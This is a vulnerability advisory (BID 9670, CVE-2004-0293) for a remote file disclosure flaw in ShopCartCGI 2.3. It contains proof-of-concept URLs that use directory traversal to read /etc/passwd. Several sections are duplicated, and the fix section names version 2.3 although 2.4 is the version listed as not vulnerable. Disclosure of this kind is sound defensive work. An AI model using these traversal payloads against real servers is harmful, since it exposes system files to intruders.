ShopCartCGI Remote File Disclosure Vulnerability
BID:9670
Info
ShopCartCGI Remote File Disclosure Vulnerability
| Bugtraq ID: | 9670 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0293 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Disclosure of this issue is credited to G00db0y. |
| Vulnerable: |
Voice Of Web AllMyVisitors 0.4 Voice Of Web AllMyVisitors 0.3 ShopCartCGI ShopCartCGI 2.3 |
| Not Vulnerable: |
ShopCartCGI ShopCartCGI 2.4 |
Discussion
ShopCartCGI Remote File Disclosure Vulnerability
It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input.
Upon successful exploitation of this issue an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input.
Upon successful exploitation of this issue an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
Exploit / POC
ShopCartCGI Remote File Disclosure Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd
Solution / Fix
ShopCartCGI Remote File Disclosure Vulnerability
Solution:
The vendor has released an update to address this issue:
ShopCartCGI ShopCartCGI 2.3
Solution:
The vendor has released an update to address this issue:
ShopCartCGI ShopCartCGI 2.3
-
ShopCartCGI ShopCartCGI
http://www.ggmate.com/ShopCartCGISoftware/
References
ShopCartCGI Remote File Disclosure Vulnerability
References:
References:
- ShopCartCGI Product Page (ShopCartCGI )
- ShopCartCGI v2.3 Remote arbitrary file retrievieving (ZetaLabs